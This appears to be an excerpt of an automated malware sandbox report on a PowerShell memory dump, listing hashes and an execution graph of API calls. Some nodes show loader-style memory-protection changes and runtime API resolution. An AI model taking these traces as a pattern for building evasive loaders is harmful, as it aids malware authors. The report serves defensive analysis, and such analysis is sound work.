                                      • Instruction ID: db9fd9a3ab725b294cf99a30565fae67950b092c7b2c3aeb83df9af880f2a8d2
                                      • Opcode Fuzzy Hash: c2d3300b66703c3321ff9c215eed56b6d070eb8a964f7009b28e8ea45d2ec796
                                      • Instruction Fuzzy Hash: C3318174B40204AFEB14EB64C865F6E7BB3AF85754F10C428EA15AF381CF75AC458B91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 84'l$84'l$84'l$84'l
                                      • API String ID: 0-2120799598
                                      • Opcode ID: 6dbdce6a8877bfde4a5090ecf31f85965dbde94346f84908e507eac9cc05fab3
                                      • Instruction ID: cd1845fad6e80ac85b33aead2b52fceb43bb41d61c2a4424c30e06abb6829973
                                      • Opcode Fuzzy Hash: 6dbdce6a8877bfde4a5090ecf31f85965dbde94346f84908e507eac9cc05fab3
                                      • Instruction Fuzzy Hash: DD02DFB1B00209DFDF24CF68C854AAEBBB6BF89714F14846AE9159B345CB71DC41CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l$(f)l$(f)l
                                      • API String ID: 0-301953305
                                      • Opcode ID: 7a8202cb83b9ce47425c83bc776c060a32630117f0b7afd81fa187d5cbf41525
                                      • Instruction ID: f4409fc5f1c6858aef8eafbaac727763904083524ebace7a41514f21783291cc
                                      • Opcode Fuzzy Hash: 7a8202cb83b9ce47425c83bc776c060a32630117f0b7afd81fa187d5cbf41525
                                      • Instruction Fuzzy Hash: 41A19DB0E00305DBDF20CF94C541E6AF7B6BF8A718F14856ED9256BB44D772A881CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2559284446.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_79c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f)l$(f)l$(f)l$(f)l
                                      • API String ID: 0-301953305
                                      • Opcode ID: 6ece542d72bf1966bffa359c81d2a56906f7a9698c70fc1a57ce55b6972363e1
                                      • Instruction ID: 68f916df56ef437913a00325b0a3486c304be55e8471a27b5fa811c2ed09195a
                                      • Opcode Fuzzy Hash: 6ece542d72bf1966bffa359c81d2a56906f7a9698c70fc1a57ce55b6972363e1
                                      • Instruction Fuzzy Hash: C5716CB0A00209DFDB14CF58C595EAEBBF6AF8A318F15806DD915AB355CB31EC41CB92

                                      Execution Graph

                                      Execution Coverage:2.8%
                                      Dynamic/Decrypted Code Coverage:99.7%
                                      Signature Coverage:3%
                                      Total number of Nodes:1583
                                      Total number of Limit Nodes:5
                                      execution_graph 6939 20eaac6b 6940 20eaac84 __startOneArgErrorHandling 6939->6940 6942 20eaacad __startOneArgErrorHandling 6940->6942 6943 20eab2f0 6940->6943 6944 20eab329 __startOneArgErrorHandling 6943->6944 6946 20eab350 __startOneArgErrorHandling 6944->6946 6954 20eab5c1 6944->6954 6947 20eab393 6946->6947 6949 20eab36e 6946->6949 6967 20eab8b2 6947->6967 6958 20eab8e1 6949->6958 6951 20eab38e __startOneArgErrorHandling 6952 20ea2ada _ValidateLocalCookies 5 API calls 6951->6952 6953 20eab3b7 6952->6953 6953->6942 6955 20eab5ec __raise_exc 6954->6955 6956 20eab7e5 RaiseException 6955->6956 6957 20eab7fd 6956->6957 6957->6946 6959 20eab8f0 6958->6959 6960 20eab90f __startOneArgErrorHandling 6959->6960 6961 20eab964 __startOneArgErrorHandling 6959->6961 6974 20ea78a3 6960->6974 6963 20eab8b2 __startOneArgErrorHandling 20 API calls 6961->6963 6965 20eab95d 6963->6965 6965->6951 6966 20eab8b2 __startOneArgErrorHandling 20 API calls 6966->6965 6968 20eab8d4 6967->6968 6971 20eab8bf 6967->6971 6969 20ea6368 _free 20 API calls 6968->6969 6970 20eab8d9 6969->6970 6970->6951 6971->6970 6972 20ea6368 _free 20 API calls 6971->6972 6973 20eab8cc 6972->6973 6973->6951 6975 20ea78cb 6974->6975 6976 20ea2ada _ValidateLocalCookies 5 API calls 6975->6976 6977 20ea78e8 6976->6977 6977->6965 6977->6966 7121 20ea742b 7122 20ea7430 7121->7122 7124 20ea7453 7122->7124 7125 20ea8bae 7122->7125 7126 20ea8bbb 7125->7126 7130 20ea8bdd 7125->7130 7127 20ea8bc9 RtlDeleteCriticalSection 7126->7127 7128 20ea8bd7 7126->7128 7127->7127 7127->7128 7129 20ea571e _free 20 API calls 7128->7129 7129->7130 7130->7122 6978 20ea506f 6979 20ea5087 6978->6979 6980 20ea5081 6978->6980 6981 20ea5000 20 API calls 6980->6981 6981->6979 6892 20ea60ac 6893 20ea60dd 6892->6893 6894 20ea60b7 6892->6894 6894->6893 6895 20ea60c7 FreeLibrary 6894->6895 6895->6894 7171 20eaa1e0 7174 20eaa1fe 7171->7174 7173 20eaa1f6 7178 20eaa203 7174->7178 7175 20eaaa53 21 API calls 7176 20eaa42f 7175->7176 7176->7173 7177 20eaa298 7177->7173 7178->7175 7178->7177 7347 20ea81a0 7348 20ea81d9 7347->7348 7349 20ea81dd 7348->7349 7360 20ea8205 7348->7360 7350 20ea6368 _free 20 API calls 7349->7350 7352 20ea81e2 7350->7352 7351 20ea8529 7353 20ea2ada _ValidateLocalCookies 5 API calls 7351->7353 7354 20ea62ac _abort 26 API calls 7352->7354 7355 20ea8536 7353->7355 7356 20ea81ed 7354->7356 7357 20ea2ada _ValidateLocalCookies 5 API calls 7356->7357 7358 20ea81f9 7357->7358 7360->7351 7361 20ea80c0 7360->7361 7362 20ea80db 7361->7362 7363 20ea2ada _ValidateLocalCookies 5 API calls 7362->7363 7364 20ea8152 7363->7364 7364->7360 7365 20ea21a1 ___scrt_dllmain_exception_filter 6204 20eac7a7 6205 20eac7be 6204->6205 6214 20eac82c 6204->6214 6205->6214 6216 20eac7e6 GetModuleHandleA 6205->6216 6206 20eac872 6207 20eac835 GetModuleHandleA 6209 20eac83f 6207->6209 6209->6209 6211 20eac85f GetProcAddress 6209->6211 6209->6214 6210 20eac7dd 6210->6209 6212 20eac800 GetProcAddress 6210->6212 6210->6214 6211->6214 6213 20eac80d VirtualProtect 6212->6213 6212->6214 6213->6214 6215 20eac81c VirtualProtect 6213->6215 6214->6206 6214->6207 6214->6209 6215->6214 6217 20eac7ef 6216->6217 6224 20eac82c 6216->6224 6228 20eac803 GetProcAddress 6217->6228 6219 20eac7f4 6222 20eac800 GetProcAddress 6219->6222 6219->6224 6220 20eac872 6221 20eac835 GetModuleHandleA 6226 20eac83f 6221->6226 6223 20eac80d VirtualProtect 6222->6223 6222->6224 6223->6224 6225 20eac81c VirtualProtect 6223->6225 6224->6220 6224->6221 6224->6226 6225->6224 6226->6224 6227 20eac85f GetProcAddress 6226->6227 6227->6224 6229 20eac82c 6228->6229 6230 20eac80d VirtualProtect 6228->6230 6232 20eac872 6229->6232 6233 20eac835 GetModuleHandleA 6229->6233 6230->6229 6231 20eac81c VirtualProtect 6230->6231 6231->6229 6235 20eac83f 6233->6235 6234 20eac85f GetProcAddress 6234->6235 6235->6229 6235->6234 7366 20ea9db8 7368 20ea9dbf 7366->7368 7367 20ea9ddf 7370 20eaa90e 7367->7370 7373 20eaaa17 21 API calls 7367->7373 7368->7367 7369 20ea9e20 7368->7369 7369->7370 7375 20eaaa17 7369->7375 7374 20eaa93e 7373->7374 7376 20eaaa20 7375->7376 7379 20eab19b 7376->7379 7380 20eab1da __startOneArgErrorHandling 7379->7380 7385 20eab25c __startOneArgErrorHandling 7380->7385 7389 20eab59e 7380->7389 7382 20eab286 7383 20eab8b2 __startOneArgErrorHandling 20 API calls 7382->7383 7384 20eab292 7382->7384 7383->7384 7387 20ea2ada _ValidateLocalCookies 5 API calls 7384->7387 7385->7382 7386 20ea78a3 __startOneArgErrorHandling 5 API calls 7385->7386 7386->7382 7388 20ea9e6e 7387->7388 7390 20eab5c1 __raise_exc RaiseException 7389->7390 7391 20eab5bc 7390->7391 7391->7385 7179 20ea5bff 7187 20ea5d5c 7179->7187 7182 20ea5b7a _abort 20 API calls 7184 20ea5c1b 7182->7184 7183 20ea5c28 7184->7183 7185 20ea5c2b 11 API calls 7184->7185 7186 20ea5c13 7185->7186 7188 20ea5c45 _abort 5 API calls 7187->7188 7189 20ea5d83 7188->7189 7190 20ea5d9b TlsAlloc 7189->7190 7191 20ea5d8c 7189->7191 7190->7191 7192 20ea2ada _ValidateLocalCookies 5 API calls 7191->7192 7193 20ea5c09 7192->7193 7193->7182 7193->7186 7392 20ea67bf 7397 20ea67f4 7392->7397 7395 20ea67db 7396 20ea571e _free 20 API calls 7396->7395 7398 20ea6806 7397->7398 7406 20ea67cd 7397->7406 7399 20ea680b 7398->7399 7400 20ea6836 7398->7400 7401 20ea637b _abort 20 API calls 7399->7401 7400->7406 7408 20ea71d6 7400->7408 7403 20ea6814 7401->7403 7405 20ea571e _free 20 API calls 7403->7405 7404 20ea6851 7407 20ea571e _free 20 API calls 7404->7407 7405->7406 7406->7395 7406->7396 7407->7406 7409 20ea71e1 7408->7409 7410 20ea71fa 7409->7410 7412 20ea7209 7409->7412 7413 20ea6368 _free 20 API calls 7410->7413 7411 20ea7218 7424 20ea8acb 7411->7424 7412->7411 7417 20ea8a98 7412->7417 7416 20ea71ff ___scrt_fastfail 7413->7416 7416->7404 7418 20ea8ab8 RtlSizeHeap 7417->7418 7419 20ea8aa3 7417->7419 7418->7411 7420 20ea6368 _free 20 API calls 7419->7420 7421 20ea8aa8 7420->7421 7422 20ea62ac _abort 26 API calls 7421->7422 7423 20ea8ab3 7422->7423 7423->7411 7425 20ea8ad8 7424->7425 7426 20ea8ae3 7424->7426 7427 20ea56d0 21 API calls 7425->7427 7428 20ea8aeb 7426->7428 7434 20ea8af4 _abort 7426->7434 7432 20ea8ae0 7427->7432 7429 20ea571e _free 20 API calls 7428->7429 7429->7432 7430 20ea8af9 7433 20ea6368 _free 20 API calls 7430->7433 7431 20ea8b1e RtlReAllocateHeap 7431->7432 7431->7434 7432->7416 7433->7432 7434->7430 7434->7431 7435 20ea474f _abort 7 API calls 7434->7435 7435->7434 7813 20ea1f3f 7814 20ea1f4b ___scrt_is_nonwritable_in_current_image 7813->7814 7831 20ea247c 7814->7831 7816 20ea1f52 7817 20ea1f7c 7816->7817 7818 20ea2041 7816->7818 7825 20ea1f57 ___scrt_is_nonwritable_in_current_image 7816->7825 7842 20ea23de 7817->7842 7820 20ea2639 ___scrt_fastfail 4 API calls 7818->7820 7821 20ea2048 7820->7821 7822 20ea1f8b __RTC_Initialize 7822->7825 7845 20ea22fc RtlInitializeSListHead 7822->7845 7824 20ea1f99 ___scrt_initialize_default_local_stdio_options 7846 20ea46c5 7824->7846 7829 20ea1fb8 7829->7825 7830 20ea4669 _abort 5 API calls 7829->7830 7830->7825 7832 20ea2485 7831->7832 7854 20ea2933 IsProcessorFeaturePresent 7832->7854 7836 20ea2496 7837 20ea249a 7836->7837 7865 20ea53c8 7836->7865 7837->7816 7840 20ea24b1 7840->7816 7841 20ea3529 ___vcrt_uninitialize 8 API calls 7841->7837 7896 20ea24b5 7842->7896 7844 20ea23e5 7844->7822 7845->7824 7848 20ea46dc 7846->7848 7847 20ea2ada _ValidateLocalCookies 5 API calls 7849 20ea1fad 7847->7849 7848->7847 7849->7825 7850 20ea23b3 7849->7850 7851 20ea23b8 ___scrt_release_startup_lock 7850->7851 7852 20ea2933 ___isa_available_init IsProcessorFeaturePresent 7851->7852 7853 20ea23c1 7851->7853 7852->7853 7853->7829 7855 20ea2491 7854->7855 7856 20ea34ea 7855->7856 7857 20ea34ef ___vcrt_initialize_winapi_thunks 7856->7857 7868 20ea3936 7857->7868 7860 20ea34fd 7860->7836 7862 20ea3505 7863 20ea3510 7862->7863 7864 20ea3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7862->7864 7863->7836 7864->7860 7892 20ea7457 7865->7892 7869 20ea393f 7868->7869 7871 20ea3968 7869->7871 7872 20ea34f9 7869->7872 7882 20ea3be0 7869->7882 7873 20ea3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7871->7873 7872->7860 7874 20ea38e8 7872->7874 7873->7872 7887 20ea3af1 7874->7887 7877 20ea3ba2 ___vcrt_FlsSetValue 6 API calls 7879 20ea390b 7877->7879 7878 20ea3918 7878->7862 7879->7878 7880 20ea391b ___vcrt_uninitialize_ptd 6 API calls 7879->7880 7881 20ea38fd 7880->7881 7881->7862 7883 20ea3a82 try_get_function 5 API calls 7882->7883 7884 20ea3bfa 7883->7884 7885 20ea3c18 InitializeCriticalSectionAndSpinCount 7884->7885 7886 20ea3c03 7884->7886 7885->7886 7886->7869 7888 20ea3a82 try_get_function 5 API calls 7887->7888 7889 20ea3b0b 7888->7889 7890 20ea3b24 TlsAlloc 7889->7890 7891 20ea38f2 7889->7891 7891->7877 7891->7881 7893 20ea7470 7892->7893 7894 20ea2ada _ValidateLocalCookies 5 API calls 7893->7894 7895 20ea24a3 7894->7895 7895->7840 7895->7841 7897 20ea24c8 7896->7897 7898 20ea24c4 7896->7898 7899 20ea2639 ___scrt_fastfail 4 API calls 7897->7899 7901 20ea24d5 ___scrt_release_startup_lock 7897->7901 7898->7844 7900 20ea2559 7899->7900 7901->7844 7131 20ea543d 7132 20ea5440 7131->7132 7133 20ea55a8 _abort 38 API calls 7132->7133 7134 20ea544c 7133->7134 6896 20ea3eb3 6899 20ea5411 6896->6899 6900 20ea541d _abort 6899->6900 6901 20ea5af6 _abort 38 API calls 6900->6901 6904 20ea5422 6901->6904 6902 20ea55a8 _abort 38 API calls 6903 20ea544c 6902->6903 6904->6902 7135 20ea5630 7136 20ea563b 7135->7136 7137 20ea5eb7 11 API calls 7136->7137 7138 20ea5664 7136->7138 7139 20ea5660 7136->7139 7137->7136 7141 20ea5688 7138->7141 7142 20ea56b4 7141->7142 7143 20ea5695 7141->7143 7142->7139 7144 20ea569f RtlDeleteCriticalSection 7143->7144 7144->7142 7144->7144 7194 20ea63f0 7195 20ea6400 7194->7195 7204 20ea6416 7194->7204 7196 20ea6368 _free 20 API calls 7195->7196 7197 20ea6405 7196->7197 7199 20ea62ac _abort 26 API calls 7197->7199 7200 20ea640f 7199->7200 7201 20ea6480 7201->7201 7224 20ea4e76 7201->7224 7203 20ea64ee 7206 20ea571e _free 20 API calls 7203->7206 7204->7201 7207 20ea6561 7204->7207 7213 20ea6580 7204->7213 7205 20ea64e5 7205->7203 7210 20ea6573 7205->7210 7230 20ea85eb 7205->7230 7206->7207 7239 20ea679a 7207->7239 7211 20ea62bc _abort 11 API calls 7210->7211 7212 20ea657f 7211->7212 7214 20ea658c 7213->7214 7214->7214 7215 20ea637b _abort 20 API calls 7214->7215 7216 20ea65ba 7215->7216 7217 20ea85eb 26 API calls 7216->7217 7218 20ea65e6 7217->7218 7219 20ea62bc _abort 11 API calls 7218->7219 7220 20ea6615 ___scrt_fastfail 7219->7220 7221 20ea66b6 FindFirstFileExA 7220->7221 7222 20ea6705 7221->7222 7223 20ea6580 26 API calls 7222->7223 7225 20ea4e87 7224->7225 7226 20ea4e8b 7224->7226 7225->7205 7226->7225 7227 20ea637b _abort 20 API calls 7226->7227 7228 20ea4eb9 7227->7228 7229 20ea571e _free 20 API calls 7228->7229 7229->7225 7231 20ea853a 7230->7231 7233 20ea8554 7231->7233 7235 20ea854f 7231->7235 7237 20ea858b 7231->7237 7232 20ea6368 _free 20 API calls 7234 20ea857a 7232->7234 7233->7205 7236 20ea62ac _abort 26 API calls 7234->7236 7235->7232 7235->7233 7236->7233 7237->7233 7238 20ea6368 _free 20 API calls 7237->7238 7238->7234 7243 20ea67a4 7239->7243 7240 20ea67b4 7242 20ea571e _free 20 API calls 7240->7242 7241 20ea571e _free 20 API calls 7241->7243 7244 20ea67bb 7242->7244 7243->7240 7243->7241 7244->7200 7436 20ea3370 7447 20ea3330 7436->7447 7448 20ea334f 7447->7448 7449 20ea3342 7447->7449 7450 20ea2ada _ValidateLocalCookies 5 API calls 7449->7450 7450->7448 6982 20ea9e71 6983 20ea9e95 6982->6983 6984 20ea9ee6 6983->6984 6986 20ea9f71 __startOneArgErrorHandling 6983->6986 6987 20ea9ef8 6984->6987 6990 20eaaa53 6984->6990 6988 20eab2f0 21 API calls 6986->6988 6989 20eaacad __startOneArgErrorHandling 6986->6989 6988->6989 6991 20eaaa70 RtlDecodePointer 6990->6991 6994 20eaaa80 6990->6994 6991->6994 6992 20eaab0d 6996 20eaab02 6992->6996 6997 20ea6368 _free 20 API calls 6992->6997 6993 20ea2ada _ValidateLocalCookies 5 API calls 6995 20eaac67 6993->6995 6994->6992 6994->6996 6998 20eaaab7 6994->6998 6995->6987 6996->6993 6997->6996 6998->6996 6999 20ea6368 _free 20 API calls 6998->6999 6999->6996 5974 4b422d5 5977 4b42309 5974->5977 5975 4b4232d Sleep 5975->5974 5976 4b4233b NtProtectVirtualMemory 5976->5977 5977->5974 5977->5975 5977->5976 7451 20ea5348 7452 20ea3529 ___vcrt_uninitialize 8 API calls 7451->7452 7453 20ea534f 7452->7453 7454 20ea7b48 7464 20ea8ebf 7454->7464 7458 20ea7b55 7477 20ea907c 7458->7477 7461 20ea7b7f 7462 20ea571e _free 20 API calls 7461->7462 7463 20ea7b8a 7462->7463 7481 20ea8ec8 7464->7481 7466 20ea7b50 7467 20ea8fdc 7466->7467 7468 20ea8fe8 ___scrt_is_nonwritable_in_current_image 7467->7468 7501 20ea5671 RtlEnterCriticalSection 7468->7501 7470 20ea905e 7515 20ea9073 7470->7515 7472 20ea8ff3 7472->7470 7473 20ea9032 RtlDeleteCriticalSection 7472->7473 7502 20eaa09c 7472->7502 7476 20ea571e _free 20 API calls 7473->7476 7474 20ea906a _abort 7474->7458 7476->7472 7478 20ea9092 7477->7478 7479 20ea7b64 RtlDeleteCriticalSection 7477->7479 7478->7479 7480 20ea571e _free 20 API calls 7478->7480 7479->7458 7479->7461 7480->7479 7482 20ea8ed4 ___scrt_is_nonwritable_in_current_image 7481->7482 7491 20ea5671 RtlEnterCriticalSection 7482->7491 7484 20ea8f77 7496 20ea8f97 7484->7496 7488 20ea8ee3 7488->7484 7490 20ea8e78 66 API calls 7488->7490 7492 20ea7b94 RtlEnterCriticalSection 7488->7492 7493 20ea8f6d 7488->7493 7489 20ea8f83 _abort 7489->7466 7490->7488 7491->7488 7492->7488 7499 20ea7ba8 RtlLeaveCriticalSection 7493->7499 7495 20ea8f75 7495->7488 7500 20ea56b9 RtlLeaveCriticalSection 7496->7500 7498 20ea8f9e 7498->7489 7499->7495 7500->7498 7501->7472 7503 20eaa0a8 ___scrt_is_nonwritable_in_current_image 7502->7503 7504 20eaa0b9 7503->7504 7505 20eaa0ce 7503->7505 7506 20ea6368 _free 20 API calls 7504->7506 7514 20eaa0c9 _abort 7505->7514 7518 20ea7b94 RtlEnterCriticalSection 7505->7518 7507 20eaa0be 7506->7507 7509 20ea62ac _abort 26 API calls 7507->7509 7509->7514 7510 20eaa0ea 7519 20eaa026 7510->7519 7512 20eaa0f5 7535 20eaa112 7512->7535 7514->7472 7783 20ea56b9 RtlLeaveCriticalSection 7515->7783 7517 20ea907a 7517->7474 7518->7510 7520 20eaa048 7519->7520 7521 20eaa033 7519->7521 7527 20eaa043 7520->7527 7538 20ea8e12 7520->7538 7522 20ea6368 _free 20 API calls 7521->7522 7524 20eaa038 7522->7524 7526 20ea62ac _abort 26 API calls 7524->7526 7526->7527 7527->7512 7528 20ea907c 20 API calls 7529 20eaa064 7528->7529 7544 20ea7a5a 7529->7544 7531 20eaa06a 7551 20eaadce 7531->7551 7534 20ea571e _free 20 API calls 7534->7527 7782 20ea7ba8 RtlLeaveCriticalSection 7535->7782 7537 20eaa11a 7537->7514 7539 20ea8e2a 7538->7539 7543 20ea8e26 7538->7543 7540 20ea7a5a 26 API calls 7539->7540 7539->7543 7541 20ea8e4a 7540->7541 7566 20ea9a22 7541->7566 7543->7528 7545 20ea7a7b 7544->7545 7546 20ea7a66 7544->7546 7545->7531 7547 20ea6368 _free 20 API calls 7546->7547 7548 20ea7a6b 7547->7548 7549 20ea62ac _abort 26 API calls 7548->7549 7550 20ea7a76 7549->7550 7550->7531 7552 20eaaddd 7551->7552 7553 20eaadf2 7551->7553 7554 20ea6355 __dosmaperr 20 API calls 7552->7554 7555 20eaae2d 7553->7555 7560 20eaae19 7553->7560 7557 20eaade2 7554->7557 7556 20ea6355 __dosmaperr 20 API calls 7555->7556 7558 20eaae32 7556->7558 7559 20ea6368 _free 20 API calls 7557->7559 7561 20ea6368 _free 20 API calls 7558->7561 7564 20eaa070 7559->7564 7739 20eaada6 7560->7739 7563 20eaae3a 7561->7563 7565 20ea62ac _abort 26 API calls 7563->7565 7564->7527 7564->7534 7565->7564 7567 20ea9a2e ___scrt_is_nonwritable_in_current_image 7566->7567 7568 20ea9a4e 7567->7568 7569 20ea9a36 7567->7569 7571 20ea9aec 7568->7571 7576 20ea9a83 7568->7576 7591 20ea6355 7569->7591 7573 20ea6355 __dosmaperr 20 API calls 7571->7573 7575 20ea9af1 7573->7575 7574 20ea6368 _free 20 API calls 7577 20ea9a43 _abort 7574->7577 7578 20ea6368 _free 20 API calls 7575->7578 7594 20ea8c7b RtlEnterCriticalSection 7576->7594 7577->7543 7580 20ea9af9 7578->7580 7582 20ea62ac _abort 26 API calls 7580->7582 7581 20ea9a89 7583 20ea9aba 7581->7583 7584 20ea9aa5 7581->7584 7582->7577 7595 20ea9b0d 7583->7595 7585 20ea6368 _free 20 API calls 7584->7585 7587 20ea9aaa 7585->7587 7588 20ea6355 __dosmaperr 20 API calls 7587->7588 7589 20ea9ab5 7588->7589 7646 20ea9ae4 7589->7646 7592 20ea5b7a _abort 20 API calls 7591->7592 7593 20ea635a 7592->7593 7593->7574 7594->7581 7596 20ea9b3b 7595->7596 7634 20ea9b34 7595->7634 7597 20ea9b5e 7596->7597 7598 20ea9b3f 7596->7598 7602 20ea9baf 7597->7602 7603 20ea9b92 7597->7603 7599 20ea6355 __dosmaperr 20 API calls 7598->7599 7601 20ea9b44 7599->7601 7600 20ea2ada _ValidateLocalCookies 5 API calls 7604 20ea9d15 7600->7604 7605 20ea6368 _free 20 API calls 7601->7605 7606 20ea9bc5 7602->7606 7649 20eaa00b 7602->7649 7607 20ea6355 __dosmaperr 20 API calls 7603->7607 7604->7589 7608 20ea9b4b 7605->7608 7652 20ea96b2 7606->7652 7611 20ea9b97 7607->7611 7612 20ea62ac _abort 26 API calls 7608->7612 7614 20ea6368 _free 20 API calls 7611->7614 7612->7634 7617 20ea9b9f 7614->7617 7615 20ea9c0c 7618 20ea9c20 7615->7618 7619 20ea9c66 WriteFile 7615->7619 7616 20ea9bd3 7620 20ea9bf9 7616->7620 7621 20ea9bd7 7616->7621 7622 20ea62ac _abort 26 API calls 7617->7622 7623 20ea9c28 7618->7623 7624 20ea9c56 7618->7624 7626 20ea9c89 GetLastError 7619->7626 7628 20ea9bef 7619->7628 7664 20ea9492 GetConsoleCP 7620->7664 7625 20ea9ccd 7621->7625 7659 20ea9645 7621->7659 7622->7634 7629 20ea9c2d 7623->7629 7630 20ea9c46 7623->7630 7690 20ea9728 7624->7690 7633 20ea6368 _free 20 API calls 7625->7633 7625->7634 7626->7628 7628->7625 7628->7634 7637 20ea9ca9 7628->7637 7629->7625 7675 20ea9807 7629->7675 7682 20ea98f5 7630->7682 7636 20ea9cf2 7633->7636 7634->7600 7639 20ea6355 __dosmaperr 20 API calls 7636->7639 7640 20ea9cb0 7637->7640 7641 20ea9cc4 7637->7641 7639->7634 7642 20ea6368 _free 20 API calls 7640->7642 7697 20ea6332 7641->7697 7644 20ea9cb5 7642->7644 7645 20ea6355 __dosmaperr 20 API calls 7644->7645 7645->7634 7738 20ea8c9e RtlLeaveCriticalSection 7646->7738 7648 20ea9aea 7648->7577 7702 20ea9f8d 7649->7702 7724 20ea8dbc 7652->7724 7654 20ea96c2 7655 20ea96c7 7654->7655 7656 20ea5af6 _abort 38 API calls 7654->7656 7655->7615 7655->7616 7657 20ea96ea 7656->7657 7657->7655 7658 20ea9708 GetConsoleMode 7657->7658 7658->7655 7660 20ea966a 7659->7660 7661 20ea969f 7659->7661 7660->7661 7662 20ea96a1 GetLastError 7660->7662 7663 20eaa181 WriteConsoleW CreateFileW 7660->7663 7661->7628 7662->7661 7663->7660 7665 20ea9607 7664->7665 7669 20ea94f5 7664->7669 7666 20ea2ada _ValidateLocalCookies 5 API calls 7665->7666 7668 20ea9641 7666->7668 7668->7628 7669->7665 7670 20ea957b WideCharToMultiByte 7669->7670 7671 20ea79e6 40 API calls __fassign 7669->7671 7674 20ea95d2 WriteFile 7669->7674 7733 20ea7c19 7669->7733 7670->7665 7672 20ea95a1 WriteFile 7670->7672 7671->7669 7672->7669 7673 20ea962a GetLastError 7672->7673 7673->7665 7674->7669 7674->7673 7680 20ea9816 7675->7680 7676 20ea98d8 7677 20ea2ada _ValidateLocalCookies 5 API calls 7676->7677 7681 20ea98f1 7677->7681 7678 20ea9894 WriteFile 7679 20ea98da GetLastError 7678->7679 7678->7680 7679->7676 7680->7676 7680->7678 7681->7628 7687 20ea9904 7682->7687 7683 20ea9a0f 7684 20ea2ada _ValidateLocalCookies 5 API calls 7683->7684 7686 20ea9a1e 7684->7686 7685 20ea9986 WideCharToMultiByte 7688 20ea99bb WriteFile 7685->7688 7689 20ea9a07 GetLastError 7685->7689 7686->7628 7687->7683 7687->7685 7687->7688 7688->7687 7688->7689 7689->7683 7695 20ea9737 7690->7695 7691 20ea97ea 7692 20ea2ada _ValidateLocalCookies 5 API calls 7691->7692 7696 20ea9803 7692->7696 7693 20ea97a9 WriteFile 7694 20ea97ec GetLastError 7693->7694 7693->7695 7694->7691 7695->7691 7695->7693 7696->7628 7698 20ea6355 __dosmaperr 20 API calls 7697->7698 7699 20ea633d _free 7698->7699 7700 20ea6368 _free 20 API calls 7699->7700 7701 20ea6350 7700->7701 7701->7634 7711 20ea8d52 7702->7711 7704 20ea9f9f 7705 20ea9fb8 SetFilePointerEx 7704->7705 7706 20ea9fa7 7704->7706 7708 20ea9fd0 GetLastError 7705->7708 7710 20ea9fac 7705->7710 7707 20ea6368 _free 20 API calls 7706->7707 7707->7710 7709 20ea6332 __dosmaperr 20 API calls 7708->7709 7709->7710 7710->7606 7712 20ea8d5f 7711->7712 7716 20ea8d74 7711->7716 7713 20ea6355 __dosmaperr 20 API calls 7712->7713 7715 20ea8d64 7713->7715 7714 20ea6355 __dosmaperr 20 API calls 7718 20ea8da4 7714->7718 7719 20ea6368 _free 20 API calls 7715->7719 7716->7714 7717 20ea8d99 7716->7717 7717->7704 7720 20ea6368 _free 20 API calls 7718->7720 7721 20ea8d6c 7719->7721 7722 20ea8dac 7720->7722 7721->7704 7723 20ea62ac _abort 26 API calls 7722->7723 7723->7721 7725 20ea8dc9 7724->7725 7727 20ea8dd6 7724->7727 7726 20ea6368 _free 20 API calls 7725->7726 7729 20ea8dce 7726->7729 7728 20ea6368 _free 20 API calls 7727->7728 7730 20ea8de2 7727->7730 7731 20ea8e03 7728->7731 7729->7654 7730->7654 7732 20ea62ac _abort 26 API calls 7731->7732 7732->7729 7734 20ea5af6 _abort 38 API calls 7733->7734 7735 20ea7c24 7734->7735 7736 20ea7a00 __fassign 38 API calls 7735->7736 7737 20ea7c34 7736->7737 7737->7669 7738->7648 7742 20eaad24 7739->7742 7741 20eaadca 7741->7564 7743 20eaad30 ___scrt_is_nonwritable_in_current_image 7742->7743 7753 20ea8c7b RtlEnterCriticalSection 7743->7753 7745 20eaad3e 7746 20eaad70 7745->7746 7747 20eaad65 7745->7747 7748 20ea6368 _free 20 API calls 7746->7748 7754 20eaae4d 7747->7754 7750 20eaad6b 7748->7750 7769 20eaad9a 7750->7769 7752 20eaad8d _abort 7752->7741 7753->7745 7755 20ea8d52 26 API calls 7754->7755 7758 20eaae5d 7755->7758 7756 20eaae63 7772 20ea8cc1 7756->7772 7758->7756 7760 20ea8d52 26 API calls 7758->7760 7768 20eaae95 7758->7768 7762 20eaae8c 7760->7762 7761 20ea8d52 26 API calls 7763 20eaaea1 CloseHandle 7761->7763 7766 20ea8d52 26 API calls 7762->7766 7763->7756 7767 20eaaead GetLastError 7763->7767 7764 20ea6332 __dosmaperr 20 API calls 7765 20eaaedd 7764->7765 7765->7750 7766->7768 7767->7756 7768->7756 7768->7761 7781 20ea8c9e RtlLeaveCriticalSection 7769->7781 7771 20eaada4 7771->7752 7773 20ea8cd0 7772->7773 7774 20ea8d37 7772->7774 7773->7774 7780 20ea8cfa 7773->7780 7775 20ea6368 _free 20 API calls 7774->7775 7776 20ea8d3c 7775->7776 7777 20ea6355 __dosmaperr 20 API calls 7776->7777 7778 20ea8d27 7777->7778 7778->7764 7778->7765 7779 20ea8d21 SetStdHandle 7779->7778 7780->7778 7780->7779 7781->7771 7782->7537 7783->7517 6913 20ea8a89 6914 20ea6d60 51 API calls 6913->6914 6915 20ea8a8e 6914->6915 7000 20ea2049 7001 20ea2055 ___scrt_is_nonwritable_in_current_image 7000->7001 7002 20ea207d 7001->7002 7003 20ea20d3 7001->7003 7013 20ea205e 7001->7013 7014 20ea244c 7002->7014 7035 20ea2639 IsProcessorFeaturePresent 7003->7035 7006 20ea20da 